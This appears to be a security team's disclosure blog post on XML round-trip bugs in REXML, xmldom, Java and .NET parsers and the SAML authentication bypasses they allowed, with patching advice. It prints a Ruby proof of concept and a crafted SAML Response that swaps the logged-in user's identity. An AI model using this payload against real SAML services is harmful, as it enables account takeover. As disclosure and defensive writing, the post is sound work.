Securing XML implementations across the web

July 28, 2021

In December 2020, we blogged about security issues in Go’s encoding/xml with critical impact on several Go-based SAML implementations. Coordinating the disclosure around those issues was no small feat; we spent months emailing the Go security team, reviewing code, testing and retesting exploits, coming up with workarounds, implementing a validation library, and finally reaching out to SAML library maintainers and 20 different companies downstream.

We’re now ready to take the next step and publicly discuss what came after Go.

Four more languages, four more vulnerable XML parsers

It turns out parsing XML is hard, and parsing and serializing it consistently is even harder. Go’s encoding/xml was far from being the only XML implementation that got it wrong. Digging deeper, we were able to identify four additional major XML parsers in four different languages that were affected by round-trip issues similar to those in the Go standard library. With two of these, we were also able to confirm identical downstream impact: authentication bypasses in major SAML implementations and web applications.

The affected XML implementations were the following:

REXML (bundled Gem in Ruby versions until 3.0)
xmldom (npm package with ~4M weekly downloads)
Xerces2 Java (the Java reference implementation of XML, bundled with OpenJDK)
System.Xml (.NET Framework)

The round-trip vulnerabilities specific to each XML implementation were reported to the maintainers. We also provided feedback and support during the remediation and reviewed potential fixes to the best of our ability.

The maintainers have now had enough time to either roll out fixes or clearly indicate that no security releases are planned:

REXML and xmldom, the two projects with confirmed downstream impact, both shipped a patch
Oracle has categorized the bugs in OpenJDK as a “Security-in-Depth issue” with a CVSS rating of 0 but is planning to publish a fix in a future CPU
The Xerces and Xalan teams at Apache remain unresponsive
Microsoft has stated the .NET issue “does not meet the definition of a security vulnerability”

What an XML round-trip vulnerability looks like

Although we already kicked off the public disclosure of XML round-trip vulnerabilities in December with Go, we’ve been relatively quiet on the technical details. Notably, we haven’t shared any proof-of-concept code. As you might imagine, this has been intentional. Particularly in the Go case, the downstream ecosystem impact was so wide that we did not feel comfortable sharing anything that could be easily turned into an exploit and used for criminal purposes.

From what we can tell, that helped. Since last year, we’ve had monitoring in place on Mattermost infrastructure capable of reliably detecting exploitation attempts, and so far have not seen a single one.

With the coordinated disclosure of the REXML vulnerabilities, things changed slightly. The disclosure was carried out through HackerOne, and the Ruby team was intent on publicly disclosing our vulnerability report immediately after releasing a patch. Code to reproduce those issues is already out, which means there is no longer a reason not to discuss it here, either.

Exploiting Ruby SAML

A major downstream library affected by the vulnerabilities in REXML was OneLogin’s Ruby SAML. A successful attack could allow full authentication bypass in applications using the SAML authentication method, and that’s a big deal. Those applications included both the cloud and on-premises offerings from GitLab. We also coordinated directly with GitLab on the topic.

As mentioned, the REXML vulnerability report on HackerOne is already public. While it details multiple bugs that can be exploited in slightly different ways, the first code example in the report still demonstrates the high-level issue and the concept of an XML round-trip vulnerability well:

require 'rexml/document'

doc = REXML::Document.new <<XML
<!DOCTYPE x [ <!NOTATION x SYSTEM 'x">]><!--'> ]>
<X>
  <Y/><![CDATA[--><X><Z/><!--]]>-->
</X>
XML

puts "First child in original doc: " + doc.root.elements[1].name
doc = REXML::Document.new doc.to_s
puts "First child after round-trip: " + doc.root.elements[1].name

This simple program parses an XML document—the string between <<XML and XML—prints out the name of the first child element, then serializes it back into a string, parses it again, and once more prints the name of the first child element. Since the document isn’t explicitly modified at any point, running the program against a well-behaving XML implementation should result in the same element name being printed twice.

Running the program against REXML 3.2.4 or earlier would result in the following output instead:

First child in original doc: Y
First child after round-trip: Z

In this specific case, the behavior was caused by a bug in the to_s method of the NotationDecl class. When serializing the system identifier of a notation declaration, mismatching quotes could be generated. This allowed a malicious system identifier to break out of a notation declaration during re-serialization, and to consume parts of the following document, altering it in almost arbitrary ways.

This is how REXML saw the original XML document from the program above:

<!DOCTYPE x [ <!NOTATION x SYSTEM 'x">]><!--'> ]>
<X>
  <Y/><![CDATA[--><X><Z/><!--]]>-->
</X>

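In this first parse, the entire first line is the DTD, because the apostrophes delimit the system identifier x">]><!--. The root element <X> contains the element <Y/> followed by a CDATA section that runs from <![CDATA[ to ]]>, so the <X><Z/> inside it is plain character data.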

And this is how it saw it after a round of parsing and serialization:

<!DOCTYPE x [ <!NOTATION x SYSTEM "x">]><!--"> ]>
<X>
  <Y/><![CDATA[--><X><Z/><!--]]>-->
</X>

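After the round-trip, the system identifier is just x, and the DTD ends at the first ]>. Everything from <!-- on the first line through --> on the third line is now a comment that swallows the original <X> and <Y/>. The <X> that used to sit inside the CDATA section becomes the root element with <Z/> as its first child, and <!--]]>--> is a second comment.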

Notice how the markup is identical except for the apostrophes that turned into quotation marks, yet the structure of the document is drastically different. The fix was relatively simple: ensuring that the generated quotation marks always match.
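The idea behind that fix can be sketched in a few lines. This is a minimal illustration, not REXML's actual patch: quote_system_literal is a hypothetical helper name, and the only assumption is the XML rule that a system literal is delimited by either quotation marks or apostrophes and must not contain its own delimiter.

```ruby
# Hypothetical helper (not part of REXML): choose a delimiter that the
# system identifier does not contain, so the value cannot end the literal early.
def quote_system_literal(value)
  if !value.include?('"')
    %("#{value}")
  elsif !value.include?("'")
    "'#{value}'"
  else
    # XML offers no escape inside a system literal, so refuse to serialize.
    raise ArgumentError, 'system identifier contains both quote characters'
  end
end

puts quote_system_literal('http://example.com/x.dtd')
puts quote_system_literal(%q(x">]><!--))
```

With a rule like this, the malicious identifier from the example keeps its apostrophes when serialized, so it stays inside the notation declaration.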

In general terms: an XML document, when parsed and serialized multiple times in a row, could change shape in completely unexpected ways. But you may still be asking yourself: “Why is this a security issue?” More specifically, you may be wondering: “How does this allow bypassing SAML authentication?” The answer is tied to the way SAML implementations often handle cryptographically signed XML documents: encoding round-trips are plentiful because the SAML and XML-DSig specifications make it very difficult to validate documents without them.

In the case of OneLogin’s Ruby SAML, it boiled down to one critical pattern: the cryptographic signatures on SAML Responses—the XML documents that tell an application who the current user is—are only validated after a round-trip through REXML, but the contents of the Response are saved in memory immediately after the first parsing.
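A safer shape for that pattern is to read the identity from the same document object that was validated. The sketch below is only an illustration under stated assumptions, not how Ruby SAML works or was patched: verified_name_id is a hypothetical name, and verifier is a hypothetical callable standing in for real XML-DSig validation.

```ruby
require 'rexml/document'

ASSERTION_NS = 'urn:oasis:names:tc:SAML:2.0:assertion'

# `verifier` is a hypothetical callable standing in for real XML-DSig
# validation; it receives the parsed document and returns true or false.
def verified_name_id(xml, verifier)
  # Round-trip first, then use this one document object for everything.
  doc = REXML::Document.new(REXML::Document.new(xml).to_s)
  raise ArgumentError, 'signature validation failed' unless verifier.call(doc)

  # Read the identity from the document that was validated, not from an
  # earlier parse of the raw input.
  node = REXML::XPath.first(doc, '//a:NameID', { 'a' => ASSERTION_NS })
  node && node.text
end
```

A real implementation would also need to confirm that the NameID it reads is actually covered by the validated signature; the sketch only shows that validation and data extraction should operate on the same parse.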

Consider the following valid, genuine, and correctly signed SAML Response:

<?xml version="1.0"?>
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" [...]>
  [...]
  <Assertion xmlns="urn:oasis:names:tc:SAML:2.0:assertion" [...]>
    <Issuer>https://login.example.com/issuer</Issuer>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      [...]
    </ds:Signature>
    <Subject>
      <NameID
        Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress"
        >[email protected]</NameID>
      [...]
    </Subject>
   [...]
  </Assertion>
</samlp:Response>

As long as the signature is valid and the expiry date hasn’t passed, this Response would allow the user named in the NameID element, Bob, to log in to the target application. But what if, instead of logging in, Bob used the Response as part of an exploit by modifying it slightly?

<?xml version="1.0"?>
<!DOCTYPE foo [
    <!NOTATION x SYSTEM 'x">]><!--'>
]>
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" [...]>
  [...]
  <Assertion xmlns="urn:oasis:names:tc:SAML:2.0:assertion" [...]>
    <Issuer>https://login.example.com/issuer</Issuer>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      [...]
    </ds:Signature>
    <Subject>
      <NameID
        Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress"
        >[email protected]</NameID>
      [...]
    </Subject>
   [...]
  </Assertion>
  <![CDATA[-->
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" [...]>
  [...]
  <Assertion xmlns="urn:oasis:names:tc:SAML:2.0:assertion" [...]>
    <Issuer>https://login.example.com/issuer</Issuer>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      [...]
    </ds:Signature>
    <Subject>
      <NameID
        Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress"
        >[email protected]</NameID>
      [...]
    </Subject>
   [...]
  </Assertion>
  <!--]]>-->
</samlp:Response>

This altered Response document would still pass all validation, because after a round-trip through REXML the additions would simply appear as a DTD and a couple of comments, both of which the validator happily ignores. But since the actual data, like the email address of the person logging in, is read before the round-trip, it would no longer match the original. Bob would end up logged in to the application as Alice.

An attacker doesn’t necessarily even need valid credentials to execute the attack: All that’s needed is a signed document of any kind. It could be an expired Response document that a developer pasted on a bug tracker. It could be a LogoutResponse that was intended for an entirely different application that just shares an IDP with the target. Or it could be a metadata document that the attacker requests directly from the IDP.
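One way to guard against the class of bug described in this section is to check, before trusting a document, that its structure survives a round-trip. The following is a minimal sketch, assuming REXML is the parser in use. The helper names shape and round_trip_stable? are hypothetical and not part of REXML or Ruby SAML, and a check like this complements a patched parser rather than replacing it. Comparing serialized strings would not be enough here, since the markup can stay textually identical while its structure changes, so the sketch compares the parsed trees.

```ruby
require 'rexml/document'

# Reduce an element to plain nested arrays: expanded name, sorted attributes,
# and children (elements plus non-blank text/CDATA; comments are ignored).
def shape(element)
  attrs = []
  element.attributes.each_attribute { |a| attrs << [a.expanded_name, a.value] }
  children = element.children.map do |node|
    case node
    when REXML::Element
      shape(node)
    when REXML::Text
      node.value unless node.value.strip.empty?
    end
  end
  [element.expanded_name, attrs.sort, children.compact]
end

# Returns true only if the tree parsed from the input has the same shape as
# the tree parsed from its own serialization. Unparseable input is rejected.
def round_trip_stable?(xml)
  first = REXML::Document.new(xml)
  second = REXML::Document.new(first.to_s)
  return false if first.root.nil? || second.root.nil?

  shape(first.root) == shape(second.root)
rescue REXML::ParseException
  false
end

puts round_trip_stable?('<X><Y a="1">hi</Y><Z/></X>')
```

An application could call round_trip_stable? on an incoming Response and refuse to process it when the result is false.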

Impact in xmldom

The xmldom JavaScript library suffered from bugs very similar to those in REXML. As stated in the advisory for CVE-2021-21366, prior to version 0.5.0, xmldom did not “correctly preserve system identifiers, FPIs or namespaces when repeatedly parsing and serializing maliciously crafted documents.” With a carefully crafted SAML Response, it was possible to bypass authentication in SAML implementations such as samlify, passport-saml, and the Finnish government fork suomifi-passport-saml.

At a high level, an exploit against passport-saml would have looked almost identical to the one against Ruby SAML, although the exact syntax required in the crafted document would have been slightly different.

No confirmed impact in .NET or Java

We were also able to identify similar round-trip behaviors in the .NET and Java implementations of XML, but with some mitigating factors. The behaviors were not reproducible in the most typical configurations and usage patterns of those XML APIs. In addition, .NET ships a built-in implementation of XML-DSig, which makes it less likely that anyone has to rely on custom code that would end up vulnerable.

Because of those mitigating factors, we were not able to identify any downstream use-cases of the XML implementations that would have been affected by the round-trip behaviors. That’s not to say there aren’t any, but it does at least seem that the vulnerable patterns in .NET and Java are not widespread.

Because we were unable to demonstrate impact, MSRC determined the round-trip behavior in .NET to not constitute a vulnerability. Similarly, Oracle determined the behavior in Java to be a “Security-in-Depth” issue with a CVSS rating of 0. A patch for OpenJDK is planned for a future CPU, but there is no estimated timeline for its availability.

Securing your applications

If you maintain an application in Ruby, JavaScript, .NET, or Java and rely on SAML or other security-critical XML use-cases, the question burning in the back of your mind should be: “How do I patch this?” The good news is that you should already be patched if you use Ruby or JavaScript and update your dependencies regularly. And if you use .NET or Java, there’s probably nothing to worry about.

Beyond that, there are a few simple steps you can take:

For Ruby applications, make sure your REXML Gem is up to date. Use bundler-audit to verify.
For JavaScript applications, similarly make sure your SAML libraries are up to date. Run npm audit to check if a vulnerable version of xmldom is included anywhere as a transitive dependency.
For Java and .NET applications, make sure you only use well-known libraries. Review any custom code carefully for XML round-trips and refactor any cases you identify.
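For Ruby applications, the REXML version that is actually loaded can also be checked at runtime. This is a minimal sketch that treats 3.2.4 as the last affected release, as stated earlier in this post. The constant LAST_AFFECTED_REXML and the method rexml_patched? are hypothetical names, and the check is a convenience alongside bundler-audit, not a replacement for it.

```ruby
require 'rubygems'

# Last affected release according to this post; later versions carry the fix.
LAST_AFFECTED_REXML = Gem::Version.new('3.2.4')

# Hypothetical helper: true if the given REXML version string is newer than
# the last affected release.
def rexml_patched?(version_string)
  Gem::Version.new(version_string) > LAST_AFFECTED_REXML
end

begin
  require 'rexml/document'
  puts "REXML #{REXML::VERSION} patched: #{rexml_patched?(REXML::VERSION)}"
rescue LoadError
  puts 'REXML is not installed in this environment'
end
```

Using Gem::Version rather than plain string comparison keeps multi-digit components in the right order, for example 3.2.10 sorting after 3.2.4.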

You can also always reach out to the Mattermost security team directly with any concerns or questions. Find our contact information in the handbook or connect with us on our Community Server.

Credits

As you’d expect, coordinating vulnerability disclosure across four different programming ecosystems, multiple libraries, and products is not something we could have done without significant help from the dozens of people on the other end. We’d like to extend our thanks to:

The Ruby and REXML maintainers
The xmldom maintainers
Everyone at Apache who helped us figure out Java
Oracle for handling their part of the OpenJDK Xerces fork
MSRC for triaging the .NET issue
GitLab for quick remediation on their end
NCSC-FI and DVV for helping coordinate the xmldom issue downstream

…and everyone else involved who we forgot to mention explicitly!